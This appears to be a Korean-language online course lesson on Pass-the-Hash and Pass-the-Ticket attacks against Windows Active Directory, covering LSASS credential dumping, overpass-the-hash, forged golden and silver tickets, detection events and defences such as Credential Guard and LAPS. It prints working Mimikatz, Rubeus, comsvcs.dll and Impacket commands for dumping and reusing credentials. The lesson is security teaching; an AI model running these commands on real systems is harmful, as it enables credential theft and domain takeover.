Pass-the-Hash와 Pass-the-Ticket
탈취한 자격 증명을 재사용합니다.
Pass-the-Hash와 Pass-the-Ticket은(는) CoddyKit의 무료 Cyber Security Academy 강의입니다. 이것은 4개 중 3번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cyber Security Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
비밀번호 없는 자격 증명
Windows 인증에서는 실제로 사용할 때 평문 비밀번호가 필요하지 않은 경우가 많습니다. NTLM 해시와 Kerberos 티켓은 각각 자체적으로 인증에 사용될 수 있습니다. 공격자는 이를 악용하여 인증 자료를 훔친 뒤 재사용합니다.
- 해시 전달 공격(PtH)은 NTLM 해시를 재사용합니다.
- 티켓 전달 공격(PtT)은 Kerberos 티켓을 재사용합니다.
- 어느 공격도 비밀번호를 해독할 필요가 없습니다.
자격 증명은 어디에 저장되는가
정상적으로 작동하는 동안 자격 증명 자료는 메모리와 디스크에 캐시됩니다. 일반적인 출처는 다음과 같습니다.
- 로그온한 사용자의 해시와 티켓은 LSASS 프로세스 메모리에 저장됩니다.
- SAM 데이터베이스에는 로컬 계정 해시가 저장됩니다.
- DC의 NTDS.dit에는 모든 도메인 해시가 저장됩니다.
- DPAPI로 보호되는 자격 증명 보관소와 브라우저 저장소가 있습니다.
LSASS를 덤프하는 것이 가장 일반적인 수집 단계입니다.
# Mimikatz: dump logon passwords and hashes
privilege::debug
sekurlsa::logonpasswords
# Comsvcs minidump of lsass (living-off-the-land)
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <pid> lsass.dmp full해시 전달 공격의 작동 방식
NTLM 인증은 챌린지-응답 과정에서 비밀번호의 해시를 비밀 값으로 사용하여 비밀번호를 알고 있음을 증명합니다. 해시를 가지고 있다면 비밀번호를 전혀 알지 못해도 핸드셰이크를 완료할 수 있습니다.
따라서 NT 해시는 비밀번호를 대신할 수 있습니다. NTLM을 허용하는 모든 서비스에 해시만으로 접근할 수 있습니다.
# Mimikatz pass-the-hash spawns a process with injected creds
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:<NThash> /run:cmd.exe
# Impacket psexec via hash
psexec.py -hashes :<NThash> corp.local/Administrator@10.0.0.20티켓 전달 공격의 작동 방식
Kerberos 티켓은 베어러 토큰이므로 유효한 TGT 또는 TGS를 가진 누구나 티켓이 만료될 때까지 사용할 수 있습니다. 공격자는 LSASS에서 티켓을 추출하여 자신의 세션에 주입합니다.
- TGT를 훔치면 해당 사용자로 서비스 티켓을 요청할 수 있습니다.
- TGS를 훔치면 특정 서비스 하나에 접근할 수 있습니다.
# Export all tickets, then inject one
Rubeus.exe dump /nowrap
Rubeus.exe ptt /ticket:doIF... (base64 blob)
# Mimikatz
sekurlsa::tickets /export
kerberos::ptt ticket.kirbi해시 전달 우회 공격
해시 전달 우회 공격(키 전달이라고도 함)은 NTLM과 Kerberos를 연결합니다. 탈취한 NTLM 또는 AES 키를 사용하여 정상적인 Kerberos TGT를 요청한 다음, 모든 작업을 Kerberos 안에서 수행합니다.
이 방식은 결과 트래픽이 일반적인 Kerberos 인증처럼 보이므로 원시 PtH보다 은밀합니다.
# Rubeus: turn an NTLM hash into a TGT
Rubeus.exe asktgt /user:svc_sql /rc4:<NThash> /ptt
# AES key is even quieter than RC4
Rubeus.exe asktgt /user:svc_sql /aes256:<key> /ptt골든 티켓과 실버 티켓
더 깊은 접근 권한을 얻은 공격자는 티켓을 직접 위조합니다.
- 골든 티켓은 krbtgt 해시로 서명한 위조 TGT입니다. 모든 ID를 부여할 수 있으며 krbtgt가 두 번 변경될 때까지 유효합니다.
- 실버 티켓은 특정 서비스 하나를 위한 위조 TGS이며 해당 서비스 계정 해시로 서명됩니다. DC에 전혀 접촉하지 않으므로 흔적이 적습니다.
- 다이아몬드 티켓은 정상적으로 발급된 TGT를 수정하여 티켓 위조 탐지를 회피합니다.
측면 이동 패턴
재사용된 자격 증명은 측면 이동을 가능하게 합니다. 일반적인 실행 경로는 다음과 같습니다.
- SMB + 서비스 생성(psexec 방식)
- WMI 원격 프로세스 생성
- WinRM / PowerShell 원격 관리
- DCOM 개체 인스턴스화
동일한 탈취 해시나 티켓 하나로 해당 계정이 로컬 관리자 권한을 가진 여러 호스트의 잠금을 해제할 수 있습니다.
로컬 관리자 재사용이 위험한 이유
여러 컴퓨터에서 하나의 로컬 관리자 비밀번호를 공유하는 것은 치명적입니다. 한 번 덤프하면 같은 비밀번호를 공유하는 모든 호스트에 PtH로 접근할 수 있습니다.
LAPS는 컴퓨터마다 고유하고 주기적으로 변경되는 로컬 관리자 비밀번호를 설정하고, 읽기 권한이 제한된 AD에 저장하여 이 문제를 해결합니다.
탐지
이러한 공격은 활동 기록을 모니터링하면 흔적을 남깁니다.
- Kerberos가 예상되는 환경에서 NTLM을 사용하는 로그온 유형
3/9 - seclogon을 사용하거나 권한이 높은 계정에서 비정상적인 NTLM을 사용하는 이벤트
4624 - 티켓 이상 징후: 선행 TGT 없이 존재하는 TGS(실버 티켓) 또는 비정상적인 유효 기간을 가진 티켓(골든 티켓)
- 표준이 아닌 프로세스에서 발생한 LSASS 접근(Sysmon 이벤트
10)
방어
보안 강화의 핵심은 자격 증명을 보호하고 격리하는 것입니다.
- Credential Guard를 활성화하여 VBS 격리 영역에서 LSASS 비밀을 격리하십시오.
- 민감한 계정을 Protected Users에 추가하십시오(NTLM 및 위임을 사용할 수 없고 티켓 수명이 짧아집니다).
- LAPS를 배포하고 관리자 계층화를 적용하여 Tier 0 자격 증명이 워크스테이션에 저장되지 않도록 하십시오.
- 골든 티켓 침해가 의심되면
krbtgt를 두 번 변경하십시오.
책임감 있게 점검하기
LSASS를 덤프하고 티켓을 위조하는 작업은 영향이 큽니다. 명시적인 승인을 받고 합의된 대상에서만 수행하십시오. 점검 범위에 포함되지 않은 운영 DC는 덤프하지 말고, 수집한 해시와 티켓은 보고 후 안전하게 폐기하십시오.
방어 팀이 탐지 규칙이 작동했는지 확인할 수 있도록 자격 증명을 재사용한 각 사례를 기록하십시오.
간단 확인
자격 증명 재사용 공격에 대한 이해를 확인하십시오.
복습
탈취한 해시와 티켓이 비밀번호를 완전히 우회하는 방식을 살펴보았습니다.
- PtH는 NTLM 해시를 재사용하고, PtT는 Kerberos 티켓을 재사용합니다.
- 해시 전달 우회 공격은 해시를 정상적인 Kerberos TGT로 변환합니다.
- 골든·실버·다이아몬드 티켓은 지속성을 위해 위조됩니다.
- Credential Guard, LAPS, Protected Users, krbtgt 변경이 핵심 방어 수단입니다.
다음에는 발판을 완전한 도메인 장악으로 확장하는 방법을 다룹니다.
AI 튜터와 함께 Cyber Security Academy을(를) 배우세요 — 무료
브라우저에서 실제 코드를 작성하고 실행하며, 24/7 AI 튜터로부터 즉각적인 도움을 받고, 웹이나 앱에서 중단한 부분부터 계속 학습하세요.
- 코스
- 76
- 레슨
- 303
자주 묻는 질문
“Pass-the-Hash와 Pass-the-Ticket” 강의는 무료인가요?
네 — “Pass-the-Hash와 Pass-the-Ticket” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cyber Security Academy 강의 전체를 잠금 해제할 수 있습니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
“Pass-the-Hash와 Pass-the-Ticket”에서 뭘 배우나요?
탈취한 자격 증명을 재사용합니다. 브라우저에서 직접 실행하는 실습 코드로 Cyber Security Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.
Cyber Security Academy을(를) 시작하는 데 경험이 필요한가요?
사전 경험은 필요하지 않습니다. CoddyKit의 Cyber Security Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 3번째 강의입니다.
“Pass-the-Hash와 Pass-the-Ticket” 강의는 얼마나 걸리나요?
대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.
이 Cyber Security Academy 강의에서 코드를 작성하고 실행할 수 있나요?
네. 모든 Cyber Security Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.
이 강의의 모든 강의
- Active Directory 공격 표면
- Kerberos와 Kerberoasting
- Pass-the-Hash와 Pass-the-Ticket
- 권한 상승과 도메인 장악